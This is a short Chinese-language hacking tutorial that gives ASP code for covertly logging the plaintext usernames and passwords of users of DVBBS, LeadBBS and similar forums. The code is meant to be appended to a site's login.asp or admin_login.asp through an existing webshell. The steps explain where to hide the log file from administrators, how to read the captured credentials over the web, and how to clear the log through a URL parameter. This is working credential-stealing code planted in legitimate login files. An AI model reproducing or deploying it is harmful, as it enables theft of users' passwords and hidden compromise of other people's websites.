很多人在得到动网的数据库后郁闷不已(呀的,管理员的变态密码让我们的机器跑砸了都没辙)
NowWeHaveAnotherMethod!!!!!这就是用asp记录明文密码。
用法:1.将此代码插入login.asp或admin_login.asp等等验证登陆的文件末尾即可。
2.将PATH换成web下可访问的路径,如:C:Inetpubwwwroot...Info.txt(info.txt的路径越深越好,防止admin发现)
3.你的webshell必须有权限修改文件且FileSystemObject可用。
4.一段时间后在IE上访问:http://.../Info.txt就可以看到登录过的用户的帐号密码。
5.在IE上输http://.../(whichyourmodified).asp?u=del可一清楚info.txt的内容。
注意:1.你可以为它添加其他功能,例如:已记录的用户不再重复记录,用邮件接收密码等等。
2.为了防止info.txt过大,我用清空info.txt的方法。
当然你可以新建文件来解决此问题。
iffilesize>200000then
setfile2=fso.OpenTextFile(PATH,2,True)
file2.WriteLine""
file2.close
endif
--------------------------------------------------------------------
<%
dimfso
dimfile
dimfile2
dimfilesize
dimfile3
setfso=server.createobject("Scripting.FileSystemObject")
IfRequest("u")="del"Then
setfile=fso.OpenTextFile(PATH,2,True)
file.WriteLine""
EndIf
Iffso.FileExists("PATH")Then
setfile=fso.OpenTextFile(PATH,8,True)
Else
setfile=fso.CreateTextFile(PATH)
endif
file.WriteLine"Username:"+Request.form("Username")
file.WriteLine"Password:"+Request.form("password")
file.close
setfile3=fso.GetFile(PATH)
filesize=file3.size
iffilesize>200000then
setfile2=fso.OpenTextFile(PATH,2,True)
file2.WriteLine""
file2.close
endif
setfile=nothing
setfile2=nothing
setfilesize=nothing
setfso=nothing
%>
----------------------------------------------------------------------
Byymqsz
E-mail:ymqsz@tom.com
【用asp记录论坛用户密码(dvbbs,leadbbs等)】相关文章:
★ 揭露88red生成htm静态页面企业建站系统漏洞第1/2页
★ 2007 10.30动易网站管理系统vote.asp页面存在SQL注入漏洞